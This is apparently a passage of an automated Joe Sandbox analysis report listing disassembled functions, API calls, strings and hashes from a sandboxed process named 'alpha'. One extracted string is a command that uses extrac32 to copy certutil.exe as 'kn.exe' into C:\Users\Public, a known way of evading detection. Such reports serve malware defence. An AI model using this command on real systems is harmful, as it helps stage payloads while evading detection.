                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 73fa9e116da620696fffe97e52088c6f91df5c18545e73a04b14457c878b2c5e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8C19065E0976282EB656B119C203BBF6A1FF49F54F85A235CA4E073D8EF3CA445C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 644a5044fc3c8f07a0ab4ce909b6d37b12d7617ee617ff8dff5f4caccfbfbd2d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05615875A19B4281EA64FB51AC245BBA3A0FF44B88FC8013ADE4D07798DF3DE5418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateFile_open_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2905481843-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8d61942647f5c4a12a376c72da80258e3d636880b1f1de2667f4a977dcf6d053
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC719136A087818AE720AF14EC5467AFAA0FF89B75F944234DA5E437D4DF3CD54A8B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3829876242-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 36f06e3d08532ca81a5edfe934237e460a1a732ce599c0ccd33d145c7dd1b7e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA617F26A1874286EA14AB11DC2417FF7A1FFC9B99F899134DE0E07795DF3CE8058B60
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 328d10fdc545fdd3fd357706b973d734f52aad3d15643e31e213ce79edac8c16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A613876708BC28AEB659F21DC643EAA7A4FF49B88F844135CA0E4B758DF38D244C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,00000000,00000000,00007FF706EB7279,?,?,?,?,?,00007FF706EBBFA9), ref: 00007FF706ED4485
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 868777d74edb1f1088c2353ef992ba6b387d6d12d71d8272d0c206ddf32aed98
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62C19E64E0C742C1EA24BB16ADA45BBA3D1BF96B84FD81132DE0D53AD1CF3DA4468360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBB998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EBBA2B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00007FF706EBBA8A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00007FF706EBBAAA
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2872855111-969133440
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47eff115fe9998b9056e7a3781a1e1898f6b1ebe7043517175e99d4e7df72602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB1B425A0DB4281EA60AB15ACA427FE7A0FF48B94FD56335CA5E477D4DF3CE8418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBFC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606811317-2340392073
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8982f3a5bf46560c87e8827512ab6cd392abc6b5887fc1d422851d0610639da5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70D19025E08B4282EA10AB15AC242BBF7A0FF557A4FD85236DE5D477A5DF3CE406C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2748242238-2468825380
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78843b0c3cf6557c70c98a33fa516fc345877d794327105bc2ee123ca5d1bab9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA19636708BC28AEB25AF209C502EAB7A1FF85788F808135DA4D4BB59DF7CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC6677
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC668F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _errno.MSVCRT ref: 00007FF706EC66A3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 00007FF706EC66C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC66E4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC66FE
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2348642995-441775793
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e671304f2227a509e37126327bb7aee79c9e8524768cf46344eb90c8190a5ce
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87714A76D08B4686E7606F25DC6017BF7A0FF89BA4F94D131DA4E06294EF3CA486D720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB9400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
